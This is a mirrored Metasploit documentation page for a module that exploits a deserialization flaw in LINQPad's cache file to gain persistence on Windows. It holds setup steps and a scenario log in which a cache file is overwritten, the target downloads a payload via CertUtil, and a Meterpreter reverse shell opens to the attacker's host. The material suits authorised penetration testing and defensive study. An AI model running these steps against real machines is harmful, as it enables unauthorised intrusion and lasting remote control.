Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/persistence/linqpad_deserialization.md
27917 views

Vulnerable Application

LINQPad is a scratchpad for .NET programming. Versions prior to 5.52 contain a deserialization vulnerability in processing cache file when program is starting. Application can be downloaded from here.

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Get session

  4. Run: use windows/local/linqpad_deserialization

  5. Set payload - for example set payload cmd/windows/generic - and corresponding parameters

  6. Set parameters session, cache_path, linqpad_path, cleanup

  7. Run exploit

Options

cache_path

The parameter sets path for folder, where vulnerable cache file is present. This is crucial part of the exploit as the folder can be used to identify whether the current version is vulnerable and the payload delivery is performed through cache file.

Scenarios

msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.3.7
msf exploit(multi/handler) > set LPORT 4545
msf exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/linqpad_deserialization_persistence) >
[*] Fetch handler listening on 192.168.3.7:8080
[*] HTTP server started
[*] Adding resource /LCG8z8xZZXJnz_uKNIZRPw
[*] Started reverse TCP handler on 192.168.3.7:4545
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. LINPad and vulnerable cache file present, target possibly exploitable
[*] Create deserialization payload
[*] Saving the original content
[*] Saved at: /home/ms/.msf4/loot/20251027153340_default_10.5.132.148_CUsersmsfuser_949460.txt
[*] Overwriting file
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/WIN10_1909_BE09_20251027.3341/WIN10_1909_BE09_20251027.3341.rc
[*] Client 10.5.132.148 requested /LCG8z8xZZXJnz_uKNIZRPw
[*] Sending payload to 10.5.132.148 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.148 requested /LCG8z8xZZXJnz_uKNIZRPw
[*] Sending payload to 10.5.132.148 (CertUtil URL Agent)
[*] Sending stage (203846 bytes) to 10.5.132.148
[*] Meterpreter session 2 opened (192.168.3.7:4545 -> 10.5.132.148:50045) at 2025-10-27 15:33:53 +0100